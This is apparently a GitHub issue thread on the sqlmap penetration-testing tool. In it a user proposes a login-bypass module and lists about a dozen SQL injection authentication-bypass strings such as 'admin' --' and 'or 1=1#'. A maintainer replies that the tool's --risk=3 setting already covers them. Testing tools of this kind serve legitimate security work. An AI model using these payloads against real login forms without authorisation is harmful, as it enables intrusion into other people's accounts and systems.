### ISSUE TITLE
suggestion: bypass login

### ISSUE THREAD

**Issue by vay3t** [sqlmapproject/sqlmap#2104]
a nice idea is the module for bypass login with sql, for example:

```
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
(...)
```

**Comment by stamparm** [comment]
This is already covered with --risk=3 and higher

**Comment by vay3t** [comment]
great, if I want to perform only such attacks, as I do with sqlmap?
